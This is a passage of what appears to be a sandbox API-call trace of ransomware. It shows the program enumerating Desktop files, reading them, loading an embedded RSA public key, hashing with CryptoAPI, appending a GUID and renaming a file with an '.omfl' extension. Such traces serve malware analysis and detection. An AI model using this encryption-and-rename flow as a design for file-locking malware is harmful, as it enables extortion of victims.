(HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.616] GetCurrentThreadId () returned 0x618 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.616] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.616] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.617] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.617] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.617] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x141a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.618] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.618] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.618] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.618] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.618] CloseHandle (hObject=0x5c8) returned 1 [0130.620] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nwzAbp1Poqclx f0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nwzabp1poqclx f0.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nwzAbp1Poqclx f0.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nwzabp1poqclx f0.m4a.omfl")) returned 1 [0130.637] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.637] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.637] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.638] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.638] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef75f180, ftCreationTime.dwHighDateTime=0x1d5d9e5, ftLastAccessTime.dwLowDateTime=0xf682a2d0, ftLastAccessTime.dwHighDateTime=0x1d5dcdc, ftLastWriteTime.dwLowDateTime=0xf682a2d0, ftLastWriteTime.dwHighDateTime=0x1d5dcdc, nFileSizeHigh=0x0, nFileSizeLow=0x18762, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oG7EuoqS8e9-7CYd0e.mkv", cAlternateFileName="OG7EUO~1.MKV")) returned 1 [0130.638] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oG7EuoqS8e9-7CYd0e.mkv") returned=".mkv" [0130.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oG7EuoqS8e9-7CYd0e.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\og7euoqs8e9-7cyd0e.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.639] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=100194) returned 1 [0130.639] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.642] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1873c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.642] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.643] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x18762, lpOverlapped=0x0) returned 1 [0130.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.644] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.645] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.645] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.645] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.645] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.645] GetLastError () returned 0x0 [0130.645] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.645] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.645] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.645] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.645] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.645] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.645] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.646] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.646] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cc8 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16cb0 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.647] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.647] GetCurrentThreadId () returned 0x618 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d6040 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.648] GetCurrentThreadId () returned 0x618 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cb0 [0130.648] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cc8 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c98 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ce0 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.649] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16cb0 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cb0 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.650] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ce0 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16cc8 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c98 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c80 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf31f0 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.651] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.651] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x1875d, lpNumberOfBytesWritten=0xe00fb14, 